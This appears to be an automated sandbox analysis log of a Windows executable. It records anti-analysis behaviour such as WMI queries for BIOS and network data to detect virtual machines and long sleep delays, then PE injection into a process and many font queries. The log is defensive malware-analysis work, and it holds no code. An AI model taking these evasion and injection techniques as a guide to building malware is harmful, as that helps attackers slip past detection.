          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe TID: 472Thread sleep time: -40023s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe TID: 4320Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe TID: 1352Thread sleep count: 461 > 30Jump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeWindow / User API: threadDelayed 461Jump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeThread delayed: delay time: 40023Jump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: Q4YODvoYjL.exe, 00000001.00000003.352966359.0000000000C68000.00000004.00000020.00020000.00000000.sdmp, Q4YODvoYjL.exe, 00000001.00000002.562716771.0000000000C77000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeMemory written: C:\Users\user\Desktop\Q4YODvoYjL.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess created: C:\Users\user\Desktop\Q4YODvoYjL.exe C:\Users\user\Desktop\Q4YODvoYjL.exeJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Users\user\Desktop\Q4YODvoYjL.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
